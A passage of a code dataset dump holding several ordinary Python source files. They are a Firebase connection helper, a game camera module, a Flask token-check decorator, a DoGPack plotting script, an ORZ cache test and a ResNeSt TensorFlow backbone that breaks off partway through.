\"/home/ubuntu/YON/secret/yorn-51648-firebase-adminsdk-14e3q-480d634a22.json\"\n # }\n config = {\n \"apiKey\": \"firebase-adminsdk-14e3q@yorn-51648.iam.gserviceaccount.com\",\n \"authDomain\": \"yorn-51648.firebaseapp.com\",\n \"databaseURL\": 'https://yorn-51648.firebaseio.com/',\n \"storageBucket\": \"yorn-51648.appspot.com\",\n \"serviceAccount\": \"/home/ubuntu/YON/secret/yorn-51648-firebase-adminsdk-14e3q-480d634a22.json\"\n } \n #self.firebase = pyrebase.initialize_app(fb_conf)\n self.firebase = pyrebase.initialize_app(config)\n\n def get_con(self):\n \"\"\" Get connection \"\"\"\n if self.firebase is None:\n self.connect_to_firebase()\n return self.firebase.database()\n\n def get_auth_con(self):\n \"\"\" Get connection \"\"\"\n if self.firebase is None:\n self.connect_to_firebase()\n return self.firebase.auth()\n\n def __init__(self):\n self.get_con()\n\n #def parse_vars(self, env):\n # \"\"\" Get environment and return post vars \"\"\"\n # try:\n # request_body_size = int(env.get('CONTENT_LENGTH', 0))\n # except ValueError:\n # request_body_size = 0\n # request_body = env['wsgi.input'].read(request_body_size)\n # return parse_qs(request_body)\n\n\ndef check_user_exist(phone=None):\n \"\"\" Check if phone exist on users/active \"\"\"\n current_app.logger.debug('common, check_user_exist: user-{0}'.format(phone))\n if phone is None:#if posted ohone is none we will take the phone from session\n phone = get_user_from_session()\n db_con = Common().get_con()\n phones = [x.key() for x in db_con.child('users', 'active').get().each()]\n return str(phone) in phones\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"335719698","text":"#Completely independent module used for moving screen (showing bigger area than possible on single window)\n#Provides scrolling and relative ovbject drawing\n\nclass Camera(): #Camera, stores point frow which is the player looking\n def __init__(self,x,y,screen_size):\n self.x = x #must be positive\n self.y = y #must be positive\n self.screen_size = screen_size #necessary to check visibility of rectangles (rects)\n \n def check_rect_visibility(self,position,size): #This fuction checks visibility of rect\n x,y = position #splits position into 2 variables\n w,l = size #splits size into width and length\n if x+w >= self.x and x <= self.x + self.screen_size[0] and y+l >= self.y and y <= self.y + self.screen_size[1]:\n return True #returns True if the rectangle is visible\n return False\n","sub_path":"Game_folder/Core/simple_modules/moduleCamera.py","file_name":"moduleCamera.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397805052","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'byb'\n\n\"\"\"\n@version: python2.7\n@author: ‘byb‘\n@license: Apache Licence \n@contact: baiyibing@gmail.com\n@site: \n@software: PyCharm\n@file: decorator.py\n@time: 2016/9/11 20:15\n\"\"\"\n\n\nfrom flask import Flask, request, jsonify, g, render_template, redirect, url_for, session, current_app\nfrom functools import wraps\n\n\ndef login_check(f):\n @wraps(f)\n def decorator(*args, **kwargs):\n token = request.headers.get('token')\n if not token:\n return jsonify({'code': 0, 'message': '需要验证'})\n\n phone_number = current_app.redis.get('token:%s' % token)\n if not phone_number or token != current_app.redis.hget('user:%s' % phone_number, 'token'):\n return jsonify({'code': 2, 'message': '验证信息错误'})\n\n return f(*args, **kwargs)\n return decorator","sub_path":"app/api_1_2/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"335177599","text":"## ------------------------------------------------------------------------- ##\ndef plotdog1(points_per_dir=1, output_directory=\"output\", point_type=1, q_name=\"a\", aux_name=\"a\", plotq1_name=\"plotq1\" ):\n \"\"\"Generic code for 1D plotting in DoGPack with matplotlib.\n\nExecute via\n\n $ python $DOGPACK/viz/python/plotdog1.py\n\nfrom an application directory. For help type\n\n $ python $DOGPACK/viz/python/plotdog1.py -h\n \nto see a list of options.\n\nParameters:\n----------\n\n points_per_dir = points per direction (spatial dimension)\n\n output_directory = location of output directory\n\n point_type = 1: uniform points on each element ( Default )\n = 2: Gauss-Legendre points on each element\n\n q_name = name of variable filename (i.e., [q_name]0000.dat, [q_name]0001.dat, ...)\n\n aux_name = name of aux variable filename (i.e., [aux_name]0000.dat, [aux_name]0001.dat, ...)\n \n plotq1_name = name of file for additional ploting options (i.e.,\n filename is [plotq1_name].py). Given that each\n application needs to define limits for axes, color\n options, etc., this is the single hook an application has\n to set additional options. Typically, this is done\n through a single call to plotq1.py.\n\nSee also: plotdog2.py and plotdog3.py for 2- and 3D plotting routines.\n\"\"\"\n\n import os\n import sys\n import numpy as np\n import matplotlib.pyplot as plt\n from helper1 import SampleBasis1\n from helper1 import read_qfile\n\n from parse_parameters import parse_ini_parameters #.ini parser\n \n TF = os.path.exists( output_directory )\n if TF==False:\n print(\"\\n Directory not found, output_directory = %s\\n\" % output_directory )\n exit()\n\n curr_dir = os.path.abspath(\"./\")\n sys.path.append(curr_dir)\n plotq1_file = os.path.abspath(\"\".join((plotq1_name,\".py\")))\n local_plotq1 = os.path.exists(plotq1_file)\n if local_plotq1==False:\n from plotq1_default import plotq1\n else:\n #from plotq1 import plotq1\n plotq1 = getattr(__import__(plotq1_name, fromlist=[\"plotq1\"]), \"plotq1\")\n\n ini_params = parse_ini_parameters( output_directory+'/parameters.ini' )\n #print('ini_params = ', ini_params)\n GridType = ini_params['mesh_type']\n meqn = ini_params['meqn']\n maux = ini_params['maux']\n nplot = ini_params['nout']\n space_order = ini_params['space_order']\n datafmt = ini_params['datafmt']\n mx = ini_params['mx']\n xlow = ini_params['xlow']\n xhigh = ini_params['xhigh']\n\n\n# params = np.zeros(8, dtype=np.float64) \n# GridType = read_params(output_directory,params,qhelpname) \n# meqn = int(params[0])\n# maux = int(params[1])\n# nplot = int(params[2])\n# space_order = int(params[3])\n# datafmt = int(params[4])\n# mx = int(params[5])\n# xlow = params[6]\n# xhigh = params[7]\n\n print(\"\")\n print(\" GridType = %s\" % GridType )\n print(\" points_per_dir = %s\" % points_per_dir )\n print(\" point_type = %s\" % point_type )\n print(\" output_directory = %s \" % output_directory )\n print(\" q_name = %s\" % q_name )\n print(\" aux_name = %s\" % aux_name )\n print(\" plotq1_name = %s\" % plotq1_name )\n print(\"\")\n\n # Grid information\n mx_old = mx\n mx = mx*points_per_dir\n dx_old = (xhigh-xlow)/np.float64(mx_old)\n dx = (xhigh-xlow)/np.float64(mx)\n\n # Construct point values on entire grid\n if( point_type == 1 ):\n\n # Location of points on Canonical element\n ds = 2.0 / (1 + points_per_dir )\n \n s1d = np.linspace( -1.+ds, 1.-ds, num=points_per_dir )\n \n # Cell centers\n xc = np.linspace( xlow+0.5*dx, xhigh-0.5*dx, mx )\n\n xc_old = np.zeros(mx_old, dtype=np.float64 )\n xc_old[0] = xlow + 0.5*dx_old\n for i in range(1, mx_old):\n xc_old[i] = xc_old[i-1] + dx_old\n\n else:\n\n # Accessors\n sq3, sq5, sq7 = ( np.sqrt(3.), np.sqrt(5.), np.sqrt(7.) )\n \n # quadrautre points (TODO - add in 6th order story ... )\n if(points_per_dir==1):\n s1d = np.array( [0.0] )\n elif(points_per_dir==2):\n s1d = np.array( [-1.0/sq3, 1.0/sq3] )\n elif(points_per_dir==3):\n s1d = np.array( [-sq3/sq5, 0.0e0, sq3/sq5] )\n elif(points_per_dir==4):\n s1d = np.array( [-sqrt(3.0+sqrt(4.8))/sq7, -sqrt(3.0-sqrt(4.8))/sq7, sqrt(3.0-sqrt(4.8))/sq7, sqrt(3.0+sqrt(4.8))/sq7] )\n elif(points_per_dir==5):\n s1d = np.array( [-np.sqrt(5.0 + np.sqrt(40.0/7.0))/3.0,\n -np.sqrt(5.0 - np.sqrt(40.0/7.0))/3.0,\n 0.0,\n np.sqrt(5.0 - np.sqrt(40.0/7.0))/3.0,\n np.sqrt(5.0 + np.sqrt(40.0/7.0))/3.0] )\n\n xc = np.zeros( mx_old*points_per_dir, dtype=np.float64 )\n xline = np.linspace( xlow+0.5*dx, xhigh-0.5*dx, mx_old )\n xline = np.linspace( xlow, xhigh, mx_old+1 )\n\n kk = 0\n for i in range( mx_old ):\n for k3 in range( kk, kk+points_per_dir ):\n xc[ k3 ] = xline[i]+(dx_old/2.)*(s1d[k3-kk]+1.0)\n kk = kk + points_per_dir\n\n ## --------------------------------------------------------------------- ##\n # Sample basis functions on mesh\n # size of phi = (points_per_dir, space_order)\n ## --------------------------------------------------------------------- ##\n phi = SampleBasis1(s1d, space_order )\n\n quit = -1\n tmp1 = \"\".join((\" Which component of q do you want to plot ( 1 - \",str(meqn)))\n tmp2 = \"\".join((tmp1,\" ) ? \"))\n m = raw_input(tmp2)\n print(\"\")\n if (not m):\n m = 1\n else:\n m = int(m)\n\n if(m<1):\n print(\"\")\n print(\" Error, need m > 1, m = %d\" % m )\n print(\"\")\n exit(1)\n elif(m>meqn): \n print(\"\")\n print(\" Error, need m <= %d, m = %d \" % (meqn, m ) )\n print(\"\")\n exit(1)\n\n nf = 0 # Frame number\n n1 = -1 # Frame number\n\n plt.ion()\n while (nf!=-1):\n tmp1 = \"\".join((\" Plot which frame ( 0 - \",str(nplot)))\n tmp2 = \"\".join((tmp1,\" ) [type -1 or type 'quit' to quit] ? \"))\n nf = raw_input(tmp2)\n if(not nf):\n n1 = n1 + 1\n nf = 0\n elif(nf==\"quit\" or nf==\"q\"):\n nf = -1\n else:\n nf = int(nf)\n n1 = nf\n\n if( n1 > nplot ):\n print(\"\")\n print(\" End of plots \" )\n print(\"\")\n n1 = nplot\n\n if( nf != -1 ):\n\n ## ------------------------------------------------------------------------- ##\n # Solution -- q\n # solution should be found in file\n # output_directory/q[n1].dat\n ## ------------------------------------------------------------------------- ##\n\n\n # Q-file name (with directory thrown in the mix)\n qfile = output_directory + \"/\" + q_name + \"%04d\" % n1 + \".dat\"\n\n # Read in the coefficients from file\n mtmp = mx_old*meqn*space_order\n time, qtmp = read_qfile(mtmp, qfile )\n qcoeffs = np.reshape(qtmp,(space_order,meqn,mx_old))\n\n # Evaluate the basis functions\n qsoln = np.zeros((mx,meqn), dtype=np.float64)\n v1 = np.zeros(space_order, dtype=np.float64)\n v2 = np.zeros(space_order, dtype=np.float64)\n for i in range(1,mx_old+1):\n for me in range(1,meqn+1):\n for ii in range(1,points_per_dir+1):\n v1[:] = phi[ii-1,:]\n v2[:] = qcoeffs[:,me-1,i-1]\n tmp = 0.0\n for k in range(0,space_order):\n tmp = tmp + v1[k]*v2[k]\n qsoln[(i-1)*points_per_dir+ii-1,me-1] = tmp\n\n ## ------------------------------------------------------------------------- ##\n # Aux arrays -- aux\n # solution should be found in file\n # output_directory/aux_name[n1].dat\n ## ------------------------------------------------------------------------- ##\n if( maux > 0):\n\n # Auxiliary file name (with directory thrown in the mix)\n afile = output_directory + \"/\" + aux_name + \"%04d\" % n1 + \".dat\"\n\n # Read in the coefficients from file\n mtmp = mx_old*maux*space_order\n time, atmp = read_qfile(mtmp, afile)\n acoeffs = np.reshape(atmp, (space_order,maux,mx_old) )\n\n # Evaluate the coefficients\n auxsoln = np.zeros((mx,maux), dtype=np.float64)\n v1 = np.zeros(space_order, dtype=np.float64)\n v2 = np.zeros(space_order, dtype=np.float64)\n for i in range(1,mx_old+1):\n for me in range(1,maux+1):\n for ii in range(1,points_per_dir+1):\n v1[:] = phi[ii-1,:]\n v2[:] = acoeffs[:,me-1,i-1]\n tmp = 0.0\n for k in range(0,space_order):\n tmp = tmp + v1[k]*v2[k]\n auxsoln[(i-1)*points_per_dir+ii-1,me-1] = tmp\n else:\n auxsoln = False\n\n ###################################################################\n #\n # USER SUPPLIED FUNCTION (or default function )\n #\n # This is your one single hook into the code for adding extra\n # information you would like to plot.\n #\n ###################################################################\n plotq1(m-1, space_order, meqn, mx, time, xc, qsoln, auxsoln)\n\n plt.ioff()\n print(\"\")\n## ------------------------------------------------------------------------- ##\n \n\n## ------------------------------------------------------------------------- ##\ndef parse_input( help_message ):\n \"\"\"Parse command line arguments for 1D plotting routines.\"\"\"\n\n import argparse, sys\n\n parser = argparse.ArgumentParser (\n prog = 'python '+ sys.argv[0],\n description = help_message,\n formatter_class = argparse.RawTextHelpFormatter,\n )\n\n parser.add_argument('-p', '--points-per-dir', \n type = int, \n default = 1, \n help =\n'''Number of points per cell to be plotted.\n(default: 1)''')\n\n parser.add_argument('-o', '--output-directory', \n type = str, \n default = 'output', \n help =\n'''Location of the output directory where coefficients can be located.\n(default: output)''')\n\n parser.add_argument('-t', '--point-type', \n type = int, \n default = 1, \n help =\n'''Type of points to be plotted. \n point-type==1: Linearly spaced.\n point-type==2: Gauss-Legendre.\n(default: 1)''')\n\n parser.add_argument( '-q', '--q-name', type = str, default='q', \n help =\n'''Name of variable used in the filename. In most routines this is 'q' but in some cases\none may wish to save additional data. For example, a 2D code may want to save\n1D data objects, and then plot them.\n(default: q).''')\n\n parser.add_argument( '-x', '--aux-name', type = str, default='a', \n help =\n'''Name of aux variable used in the filename. In most routines this is 'a' but in some cases\none may wish to save additional data. For example, a 2D code may want to save\n1D data objects, and then plot them.\n(default: a).''')\n\n parser.add_argument( '-a', '--plotq1-name', \n type = str, \n default = 'plotq1', \n help =\n'''filename for file with additional plotting options.\n(default: plotq1)''')\n\n return parser.parse_args()\n#----------------------------------------------------------\n\nif __name__== '__main__':\n \"\"\"Main python plotting routine for 1D simulations in DoGPack.\n\n When run from the command line, this script parses user supplied command\n line arguments, if any, and then executes plotdog1. To see a list of\n options, type \n\n python $DOGPACK/viz/python/plotq1.py -h\n\n \"\"\"\n\n # Parse input arguments\n args = parse_input( plotdog1.__doc__ )\n #print(args)\n #print('')\n\n # Call the main 1D plotting routine\n plotdog1(args.points_per_dir, args.output_directory, args.point_type, args.q_name, args.aux_name, args.plotq1_name )\n","sub_path":"dogpack-developer/viz/python/plotdog1.py","file_name":"plotdog1.py","file_ext":"py","file_size_in_byte":12687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65990798","text":"from unittest import TestCase, skip\n\nfrom .env_init import store, mc, initted\nfrom ORZ.exports import OrzBase, OrzField, orz_get_multi, OrzPrimaryField, setup as setup_orz\n\nclass MCDetector(object):\n def __init__(self, mc):\n self.mc = mc\n self.hitted = False\n\n def get(self, key):\n ret = self.mc.get(key)\n self.hitted = (ret is not None)\n return ret\n\n\n def __getattr__(self, attr):\n return getattr(self.mc, attr)\n\nmcd = MCDetector(mc)\nsetup_orz(store, mcd)\n\nclass Dummy(OrzBase):\n __orz_table__ = 'test_orz'\n\n subject_id = OrzField(as_key=OrzField.KeyType.ASC)\n ep_num = OrzField(as_key=OrzField.KeyType.ASC, default=0)\n content = OrzField(default='hello world')\n\nclass TestCache(TestCase):\n def setUp(self):\n cursor = store.get_cursor()\n cursor.execute('''DROP TABLE IF EXISTS `test_orz`''')\n cursor.delete_without_where = True\n cursor.execute('''\n CREATE TABLE `test_orz`\n ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n `subject_id` int(10) unsigned NOT NULL,\n `ep_num` int(10) unsigned NOT NULL,\n `content` varchar(100) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_subject` (`subject_id`, `ep_num`, `id`)) ENGINE=MEMORY AUTO_INCREMENT=1''')\n\n def tearDown(self):\n store.get_cursor().execute('truncate table `test_orz`')\n mc.clear()\n\n def test_invalidation(self):\n def run_pred(cond_and_pred):\n for cond, pred in cond_and_pred:\n Dummy.gets_by(**cond)\n self.assertEqual(mcd.hitted, pred)\n\n cond_all = dict(subject_id=1, ep_num=1)\n cond_1 = dict(subject_id=1)\n d = Dummy.create(**cond_all)\n before = (\n (cond_all, False),\n (cond_all, True),\n (cond_1, False),\n (cond_1, True),\n )\n\n after = (\n (cond_all, False),\n (cond_1, False),\n )\n\n run_pred(before)\n d.invalidate_cache()\n run_pred(after)\n\n mcd.clear()\n\n run_pred(before)\n Dummy.invalidate_cache_by_condition(**cond_all)\n run_pred(after)\n\n","sub_path":"tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510999866","text":"\"\"\"Contains definition of ResNest\nAdapted from https://github.com/QiaoranC/tf_ResNeSt_RegNet_model\nSee https://arxiv.org/pdf/2004.08955.pdf\n\"\"\"\n\nimport tensorflow as tf\n\nfrom official.modeling import hyperparams\nfrom tensorflow.keras import models\nfrom tensorflow.keras.activations import softmax\nfrom tensorflow.keras.utils import get_custom_objects\nfrom tensorflow.keras.layers import (\n Activation,\n Add,\n AveragePooling2D,\n BatchNormalization,\n Conv2D,\n Dense,\n Dropout,\n GlobalAveragePooling2D,\n Input,\n InputSpec,\n MaxPool2D,\n UpSampling2D,\n)\n\nfrom official.modeling import tf_utils\nfrom official.vision.beta.modeling.backbones import factory\n\nRESNEST_SPECS = {\n 50: {\n 'blocks_set': [3,4,6,3],\n 'stem_width': 32,\n },\n 101: {\n 'blocks_set': [3,4,23,3],\n 'stem_width': 64,\n },\n 200: {\n 'blocks_set': [3,24,36,3],\n 'stem_width': 64,\n },\n 269: {\n 'blocks_set': [3,30,48,8],\n 'stem_width': 64,\n },\n}\n\n\ndef get_flops(model):\n run_meta = tf.compat.v1.RunMetadata()\n opts = tf.compat.v1.profiler.ProfileOptionBuilder.float_operation()\n\n # We use the Keras session graph in the call to the profiler.\n flops = tf.compat.v1.profiler.profile(\n graph=tf.compat.v1.keras.backend.get_session().graph, run_meta=run_meta, cmd=\"op\", options=opts\n )\n\n return flops.total_float_ops # Prints the \"flops\" of the model.\n\n\nclass Mish(Activation):\n \"\"\"\n based on https://github.com/digantamisra98/Mish/blob/master/Mish/TFKeras/mish.py\n Mish Activation Function.\n \"\"\"\n\n def __init__(self, activation, **kwargs):\n super(Mish, self).__init__(activation, **kwargs)\n self.__name__ = \"Mish\"\n\n\ndef mish(inputs):\n # with tf.device(\"CPU:0\"):\n result = inputs * tf.math.tanh(tf.math.softplus(inputs))\n return result\n\n\nclass GroupedConv2D(object):\n \"\"\"Groupped convolution.\n https://github.com/tensorflow/tpu/blob/master/models/official/mnasnet/mixnet/custom_py\n Currently tf.keras and tf.layers don't support group convolution, so here we\n use split/concat to implement this op. It reuses kernel_size for group\n definition, where len(kernel_size) is number of groups. Notably, it allows\n different group has different kernel size.\n \"\"\"\n\n def __init__(self, filters, kernel_size, use_keras=True, **kwargs):\n \"\"\"Initialize the layer.\n Args:\n filters: Integer, the dimensionality of the output space.\n kernel_size: An integer or a list. If it is a single integer, then it is\n same as the original Conv2D. If it is a list, then we split the channels\n and perform different kernel for each group.\n use_keras: An boolean value, whether to use keras layer.\n **kwargs: other parameters passed to the original conv2d layer.\n \"\"\"\n self._groups = len(kernel_size)\n self._channel_axis = -1\n\n self._convs = []\n splits = self._split_channels(filters, self._groups)\n for i in range(self._groups):\n self._convs.append(self._get_conv2d(splits[i], kernel_size[i], use_keras, **kwargs))\n\n def _get_conv2d(self, filters, kernel_size, use_keras, **kwargs):\n \"\"\"A helper function to create Conv2D layer.\"\"\"\n if use_keras:\n return Conv2D(filters=filters, kernel_size=kernel_size, **kwargs)\n else:\n return Conv2D(filters=filters, kernel_size=kernel_size, **kwargs)\n\n def _split_channels(self, total_filters, num_groups):\n split = [total_filters // num_groups for _ in range(num_groups)]\n split[0] += total_filters - sum(split)\n return split\n\n def __call__(self, inputs):\n if len(self._convs) == 1:\n return self._convs[0](inputs)\n\n if tf.__version__ < \"2.0.0\":\n filters = inputs.shape[self._channel_axis].value\n else:\n filters = inputs.shape[self._channel_axis]\n splits = self._split_channels(filters, len(self._convs))\n x_splits = tf.split(inputs, splits, self._channel_axis)\n x_outputs = [c(x) for x, c in zip(x_splits, self._convs)]\n x = tf.concat(x_outputs, self._channel_axis)\n return x\n\n\n@tf.keras.utils.register_keras_serializable(package='Vision')\nclass ResNest(tf.keras.Model):\n def __init__(self, \n model_id,\n input_specs=InputSpec(shape=[None, None, None, 3]),\n stem_type='v1',\n activation=\"relu\",\n dropout_rate=0.2,\n radix=2, \n groups=1,\n bottleneck_width=64, \n block_expansion=4, \n avg_down=True,\n avd=True, \n avd_first=False, \n preact=False, \n using_basic_block=False,\n using_cb=False):\n self.channel_axis = -1 # not for change\n self.model_id = model_id\n self.activation = activation\n self.input_specs = input_specs\n self.dropout_rate = dropout_rate\n\n self.blocks_set = RESNEST_SPECS[model_id]['blocks_set']\n self.radix = radix\n self.cardinality = groups\n self.bottleneck_width = bottleneck_width\n\n self.deep_stem = stem_type == 'v1'\n self.stem_width = RESNEST_SPECS[model_id]['stem_width']\n self.block_expansion = block_expansion\n self.avg_down = avg_down\n self.avd = avd\n self.avd_first = avd_first\n\n self.dilation = 1\n self.preact = preact\n self.using_basic_block = using_basic_block\n self.using_cb = using_cb\n\n # get_custom_objects().update({'mish': Mish(mish)})\n\n input_sig = Input(shape=self.input_specs.shape[1:])\n x = self._make_stem(input_sig, stem_width=self.stem_width, deep_stem=self.deep_stem)\n\n if self.preact is False:\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n print(\"stem_out\", x.shape)\n\n x = MaxPool2D(pool_size=3, strides=2, padding=\"same\", data_format=\"channels_last\")(x)\n print(\"MaxPool2D out\", x.shape)\n\n if self.preact is True:\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n \n endpoints = {}\n i = 0\n if self.using_cb:\n second_x = x\n second_x = self._make_layer(x, blocks=self.blocks_set[0], filters=64, stride=1, is_first=False)\n second_x_tmp = self._make_Composite_layer(second_x,filters=x.shape[-1],upsample=False)\n print('layer 0 db_com',second_x_tmp.shape)\n x = Add()([second_x_tmp, x])\n x = self._make_layer(x, blocks=self.blocks_set[0], filters=64, stride=1, is_first=False)\n endpoints[str(i + 2)] = x\n print(\"-\" * 5, \"layer 0 out\", x.shape, \"-\" * 5)\n\n b1_b3_filters = [64,128,256,512]\n for i in range(1, 4):\n if self.using_cb:\n second_x = self._make_layer(x, blocks=self.blocks_set[i], filters=b1_b3_filters[i], stride=2)\n second_x_tmp = self._make_Composite_layer(second_x,filters=x.shape[-1])\n print('layer {} db_com out {}'.format(i,second_x_tmp.shape))\n x = Add()([second_x_tmp, x])\n x = self._make_layer(x, blocks=self.blocks_set[i], filters=b1_b3_filters[i], stride=2)\n print('----- layer {} out {} -----'.format(i,x.shape))\n endpoints[str(i + 2)] = x\n \n self._output_specs = {l: endpoints[l].get_shape() for l in endpoints}\n print(self._output_specs)\n\n super(ResNest, self).__init__(inputs=input_sig, outputs=endpoints)\n\n def _make_stem(self, input_tensor, stem_width=64, deep_stem=False):\n x = input_tensor\n if deep_stem:\n x = Conv2D(stem_width, kernel_size=3, strides=2, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(x)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n x = Conv2D(stem_width, kernel_size=3, strides=1, padding=\"same\",\n kernel_initializer=\"he_normal\", use_bias=False, data_format=\"channels_last\")(x)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n x = Conv2D(stem_width * 2, kernel_size=3, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(x)\n\n # x = BatchNormalization(axis=self.channel_axis,epsilon=1.001e-5)(x)\n # x = tf_utils.get_activation(self.activation)(x)\n else:\n x = Conv2D(stem_width, kernel_size=7, strides=2, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(x)\n # x = BatchNormalization(axis=self.channel_axis,epsilon=1.001e-5)(x)\n # x = tf_utils.get_activation(self.activation)(x)\n return x\n\n def _rsoftmax(self, input_tensor, filters, radix, groups):\n x = input_tensor\n batch = x.shape[0]\n if radix > 1:\n x = tf.reshape(x, [-1, groups, radix, filters // groups])\n x = tf.transpose(x, [0, 2, 1, 3])\n x = tf.keras.activations.softmax(x, axis=1)\n x = tf.reshape(x, [-1, 1, 1, radix * filters])\n else:\n x = Activation(\"sigmoid\")(x)\n return x\n\n def _SplAtConv2d(self, input_tensor, filters=64, kernel_size=3, stride=1, dilation=1, groups=1, radix=0):\n x = input_tensor\n in_channels = input_tensor.shape[-1]\n\n x = GroupedConv2D(filters=filters * radix, kernel_size=[kernel_size for i in range(groups * radix)],\n use_keras=True, padding=\"same\", kernel_initializer=\"he_normal\", use_bias=False,\n data_format=\"channels_last\", dilation_rate=dilation)(x)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n batch, rchannel = x.shape[0], x.shape[-1]\n if radix > 1:\n splited = tf.split(x, radix, axis=-1)\n gap = sum(splited)\n else:\n gap = x\n\n # print('sum',gap.shape)\n gap = GlobalAveragePooling2D(data_format=\"channels_last\")(gap)\n gap = tf.reshape(gap, [-1, 1, 1, filters])\n # print('adaptive_avg_pool2d',gap.shape)\n\n reduction_factor = 4\n inter_channels = max(in_channels * radix // reduction_factor, 32)\n\n x = Conv2D(inter_channels, kernel_size=1)(gap)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n x = Conv2D(filters * radix, kernel_size=1)(x)\n\n atten = self._rsoftmax(x, filters, radix, groups)\n\n if radix > 1:\n logits = tf.split(atten, radix, axis=-1)\n out = sum([a * b for a, b in zip(splited, logits)])\n else:\n out = atten * x\n return out\n\n def _make_block(\n self, input_tensor, first_block=True, filters=64, stride=2, radix=1, avd=False, avd_first=False, is_first=False\n ):\n x = input_tensor\n inplanes = input_tensor.shape[-1]\n if stride != 1 or inplanes != filters * self.block_expansion:\n short_cut = input_tensor\n if self.avg_down:\n if self.dilation == 1:\n short_cut = AveragePooling2D(pool_size=stride, strides=stride, padding=\"same\", data_format=\"channels_last\")(\n short_cut\n )\n else:\n short_cut = AveragePooling2D(pool_size=1, strides=1, padding=\"same\", data_format=\"channels_last\")(short_cut)\n short_cut = Conv2D(filters * self.block_expansion, kernel_size=1, strides=1, padding=\"same\",\n kernel_initializer=\"he_normal\", use_bias=False, data_format=\"channels_last\")(short_cut)\n else:\n short_cut = Conv2D(filters * self.block_expansion, kernel_size=1, strides=stride, padding=\"same\",\n kernel_initializer=\"he_normal\", use_bias=False, data_format=\"channels_last\")(short_cut)\n\n short_cut = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(short_cut)\n else:\n short_cut = input_tensor\n # should the above be in make layer?\n # see https://github.com/zhanghang1989/ResNeSt/blob/master/resnest/torch/resnet.py\n\n group_width = int(filters * (self.bottleneck_width / 64.0)) * self.cardinality\n x = Conv2D(group_width, kernel_size=1, strides=1, padding=\"same\", kernel_initializer=\"he_normal\", use_bias=False,\n data_format=\"channels_last\")(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n avd = avd and (stride > 1 or is_first)\n\n if avd:\n avd_layer = AveragePooling2D(pool_size=3, strides=stride, padding=\"same\", data_format=\"channels_last\")\n stride = 1\n\n if avd and avd_first:\n x = avd_layer(x)\n\n if radix >= 1:\n x = self._SplAtConv2d(x, filters=group_width, kernel_size=3, stride=stride, dilation=self.dilation,\n groups=self.cardinality, radix=radix)\n else:\n x = Conv2D(group_width, kernel_size=3, strides=stride, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n if avd and not avd_first:\n x = avd_layer(x)\n # print('can')\n x = Conv2D(filters * self.block_expansion, kernel_size=1, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n\n m2 = Add()([x, short_cut])\n m2 = tf_utils.get_activation(self.activation)(m2)\n return m2\n\n def _make_block_basic(\n self, input_tensor, first_block=True, filters=64, stride=2, radix=1, avd=False, avd_first=False, is_first=False\n ):\n \"\"\"Conv2d_BN_Relu->Bn_Relu_Conv2d\n \"\"\"\n x = input_tensor\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n short_cut = x\n inplanes = input_tensor.shape[-1]\n if stride != 1 or inplanes != filters * self.block_expansion:\n if self.avg_down:\n if self.dilation == 1:\n short_cut = AveragePooling2D(pool_size=stride, strides=stride, padding=\"same\", data_format=\"channels_last\")(\n short_cut\n )\n else:\n short_cut = AveragePooling2D(pool_size=1, strides=1, padding=\"same\", data_format=\"channels_last\")(short_cut)\n short_cut = Conv2D(filters, kernel_size=1, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(short_cut)\n else:\n short_cut = Conv2D(filters, kernel_size=1, strides=stride, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(short_cut)\n\n group_width = int(filters * (self.bottleneck_width / 64.0)) * self.cardinality\n avd = avd and (stride > 1 or is_first)\n avd_first = avd_first\n\n if avd:\n avd_layer = AveragePooling2D(pool_size=3, strides=stride, padding=\"same\", data_format=\"channels_last\")\n stride = 1\n\n if avd and avd_first:\n x = avd_layer(x)\n\n if radix >= 1:\n x = 